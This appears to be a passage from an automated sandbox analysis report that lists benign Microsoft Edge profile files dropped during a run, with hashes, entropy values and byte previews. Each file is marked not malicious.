                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):426
                                                                                                                                                                                                                                                                  Entropy (8bit):5.207440362252633
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7KeM+vVaYebvqBZFUt8OKGb/+OKHMV5OaYebvqBaJ:7NdVaYebvyg8Ox02OaYebvL
                                                                                                                                                                                                                                                                  MD5:811391DBC87BACAD3F40A9332E8CCD13
                                                                                                                                                                                                                                                                  SHA1:7BEBEF7E232F933CB6F6F2715A08D22C4D6830F4
                                                                                                                                                                                                                                                                  SHA-256:28EAA3FFF52ACF9FC9FF5E89628597AB5BD3F0E017880726FD4C73E23229ED5C
                                                                                                                                                                                                                                                                  SHA-512:8CDAC4D2D67E8A571237EEB91C4C75E3A15084E3620F52EF2FF36959EFC054BC89D87840AE31FDDC20AFBC69220FDD43C08182E293DDF6531C53462B4527E44E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:42.128 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-07:44:42.129 1e8c Recovering log #3.2024/12/19-07:44:42.132 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):426
                                                                                                                                                                                                                                                                  Entropy (8bit):5.207440362252633
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7KeM+vVaYebvqBZFUt8OKGb/+OKHMV5OaYebvqBaJ:7NdVaYebvyg8Ox02OaYebvL
                                                                                                                                                                                                                                                                  MD5:811391DBC87BACAD3F40A9332E8CCD13
                                                                                                                                                                                                                                                                  SHA1:7BEBEF7E232F933CB6F6F2715A08D22C4D6830F4
                                                                                                                                                                                                                                                                  SHA-256:28EAA3FFF52ACF9FC9FF5E89628597AB5BD3F0E017880726FD4C73E23229ED5C
                                                                                                                                                                                                                                                                  SHA-512:8CDAC4D2D67E8A571237EEB91C4C75E3A15084E3620F52EF2FF36959EFC054BC89D87840AE31FDDC20AFBC69220FDD43C08182E293DDF6531C53462B4527E44E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:42.128 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-07:44:42.129 1e8c Recovering log #3.2024/12/19-07:44:42.132 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                                                                  Entropy (8bit):5.238328201068608
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPIQx3+q2PN723oH+TcwtpIFUt8OoPISdZmw+OoPIShVkwON723oH+Tcwta/WLJ:7sOvVaYebmFUt8OCd/+OCv5OaYebaUJ
                                                                                                                                                                                                                                                                  MD5:C80042FD91A6C7F27CF18D416BA28FE2
                                                                                                                                                                                                                                                                  SHA1:D66F1DA1CE0761967C48DD2CF9E22415D403DE34
                                                                                                                                                                                                                                                                  SHA-256:75F1A70367F4EA1F9F198081CFE396C3EBF3879156F46EA83ABF54683EAE67D1
                                                                                                                                                                                                                                                                  SHA-512:9411DF5DEC3B9DEC641CA7C68EB1E9FBF59FB39044449B2BDE007F5AA59351796A299B4D15D2AF25CF50C32D242FF663E4F70B1838D5EE6EC2200A73D54AAE76
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.485 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-07:44:23.487 1d98 Recovering log #3.2024/12/19-07:44:23.487 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                                                                  Entropy (8bit):5.238328201068608
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPIQx3+q2PN723oH+TcwtpIFUt8OoPISdZmw+OoPIShVkwON723oH+Tcwta/WLJ:7sOvVaYebmFUt8OCd/+OCv5OaYebaUJ
                                                                                                                                                                                                                                                                  MD5:C80042FD91A6C7F27CF18D416BA28FE2
                                                                                                                                                                                                                                                                  SHA1:D66F1DA1CE0761967C48DD2CF9E22415D403DE34
                                                                                                                                                                                                                                                                  SHA-256:75F1A70367F4EA1F9F198081CFE396C3EBF3879156F46EA83ABF54683EAE67D1
                                                                                                                                                                                                                                                                  SHA-512:9411DF5DEC3B9DEC641CA7C68EB1E9FBF59FB39044449B2BDE007F5AA59351796A299B4D15D2AF25CF50C32D242FF663E4F70B1838D5EE6EC2200A73D54AAE76
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.485 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-07:44:23.487 1d98 Recovering log #3.2024/12/19-07:44:23.487 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0033769341339387224
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:ImtVuXhLOOl9gEml:IiVuxRgEm
                                                                                                                                                                                                                                                                  MD5:15A12BAE42E35C5F363723760E101E75
                                                                                                                                                                                                                                                                  SHA1:FA1E447B6FE08DD58DAB29FBC144AC36BECD792C
                                                                                                                                                                                                                                                                  SHA-256:9766F1ED32A1348F8D11373F04106DC2AC16CB194DB0BFB0FCEE6D9FDB393EEA
                                                                                                                                                                                                                                                                  SHA-512:FA41FD56B84900D99A3C8578D5544E66507889375E1580699A6521A431C21C8C6AEE37CC77A0BEFC1C4A6AD2D29C2F3DD055F58A3D1CD46D568F7B4D1FFB4297
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:VLnk.....?........A..Z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                  Entropy (8bit):1.267376453147767
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:L/2qOB1nxCkMPSA1LyKOMq+8iP5GDHP/0jMVumI/:Kq+n0JP91LyKOMq+8iP5GLP/09
                                                                                                                                                                                                                                                                  MD5:F1C097FA701FDC7F77BC3B1120015CFC
                                                                                                                                                                                                                                                                  SHA1:C47D31F9C813F782699EE8CD95C26C6A84754829
                                                                                                                                                                                                                                                                  SHA-256:91C2E8A30247FB11CAAB3543D46604A256965A362E4DC3D1A52D2C88D7DD1BEC
                                                                                                                                                                                                                                                                  SHA-512:404543D11CFF4A7B30F84EFDB1C440920B6E01F3A52C449BF34710CE73AB92C9FFF904A0F750C22A6A10B8FE15A6211F981151A8370EE63DE159F1429DC8F63A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2568
                                                                                                                                                                                                                                                                  Entropy (8bit):0.06569804787746028
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:falFl1l3/PlJa:WH/a
                                                                                                                                                                                                                                                                  MD5:B5A2156C3012F7D283C812255AAA59FA
                                                                                                                                                                                                                                                                  SHA1:B6920CDD9A6A13DB9A0AEF5D0273D6D41ADF7D1D
                                                                                                                                                                                                                                                                  SHA-256:B9948A9126891F96183F5DC65475606476F00B2F13234E3A2FAB9AC8A325892E
                                                                                                                                                                                                                                                                  SHA-512:A3289D20CF303F8EE7BD1071411F621C41A730657DE61E1523BE2BA4A845E81F6F20BB83D1165BA626497BCB084C90E2DC3024FA4F593E0AC490CB6492480DD4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:............W963...`.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                  Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                                  MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                                  SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                                  SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                                  SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c144badc-c6de-4971-b046-83295bca50db.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e58efcc9-f36a-4742-b6ba-b9b961acdd9d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):38627
                                                                                                                                                                                                                                                                  Entropy (8bit):5.554781722693888
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:fDSb8VW9k7pLGLhNnW5wwyf41/8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPdiIfMSXE:fewVuochNnWawyf2/u1jaEnnEdZyPot/
                                                                                                                                                                                                                                                                  MD5:B47CEBF703F067C9D222BABAC674A59D
                                                                                                                                                                                                                                                                  SHA1:1B1A0FFCC004BA5375B1DDDAD6BE4C3BE8E212DC
                                                                                                                                                                                                                                                                  SHA-256:BF2A5F78651D19FB3DED0DD0F5BEBF1495F007C5D29B83125E60FCB0D3DBC52E
                                                                                                                                                                                                                                                                  SHA-512:6C6F1536ADDE6818C01FFD905172FA650AE212CE0844B7EB8A23F102E0ABE8332A8076F64515DF9BADC347231E8B46A16380CA8B009C7A66256FA70D41925B25
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379085863338265","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379085863338265","location":5,"ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fa8518aa-013e-46a1-be72-97a15bdc0f9c.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9378
                                                                                                                                                                                                                                                                  Entropy (8bit):5.087202625297569
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:stRSns3AkaFvrEmkiOb3n88bV+FiA3UiPsYJ:stR+s3AkCD9SbGi3O
                                                                                                                                                                                                                                                                  MD5:689A0BA1F5EAF4035EC7FDDB659AFDBC
                                                                                                                                                                                                                                                                  SHA1:9597255F9F40D11B32C6A3C2823C51279EA026A4
                                                                                                                                                                                                                                                                  SHA-256:21EA47B7E58059125ECDCC2D09109A02B58A77B9E45056C626F04A9FB410DEF5
                                                                                                                                                                                                                                                                  SHA-512:333AB9D538CC5A83D8F1E82992B052F9569CFE736D44C2C11BB44FBB410B9320AE97A95DFD9FBE581FA7AE70360347890849FD130AE08862342B433821D07529
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379085864229071","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                  Entropy (8bit):0.06113452761062808
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:Gy0SOeH+TqIy0SOeH+Tqp89XCChslotGLNl0ml/Vl/Vl/U8oQXmlXCUWls:CUeTqUUeTqpspEjVl/PnvoQW1
                                                                                                                                                                                                                                                                  MD5:5E9A00AE77A571847932BD1128EB37A5
                                                                                                                                                                                                                                                                  SHA1:EC8BAB50FCA2E3458E2CE3552A6E8E90494BC672
                                                                                                                                                                                                                                                                  SHA-256:5CA2AFBA8CD849B7835B78E52EEDFDBF9356ED273662AC448B326A4D4B296DDA
                                                                                                                                                                                                                                                                  SHA-512:CEEA2BEC9BC1795C5FF89129A05DEB95CF65E678B0D32DD1443675FAE01CC9A9B40692A9073508CD9BE6ED726DD100FF840A08D0D030D51E4E54CA0EF667D5C0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..-.....................4.<+f...$J...V....{.6.....-.....................4.<+f...$J...V....{.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):119512
                                                                                                                                                                                                                                                                  Entropy (8bit):0.7415508102319124
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aD:e6xLV0xNs/cNswO5NshNsaILc99
                                                                                                                                                                                                                                                                  MD5:5D14363451406BEBE63354F2633E8AD1
                                                                                                                                                                                                                                                                  SHA1:C279827F5A076B3EAF9591E94E27D058CB609B27
                                                                                                                                                                                                                                                                  SHA-256:FADA07E89DC2C26E4BBE82A926E322096A8AC40F56EC0805311965761772AE98
                                                                                                                                                                                                                                                                  SHA-512:AB6D7308A79BAB4F0CD43844A8212616483807F857D037E0664391145174B60A0D7F93E2D44108F8CCF00C3869B1C560852F8313091273CFDFBBFC0333C814B1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
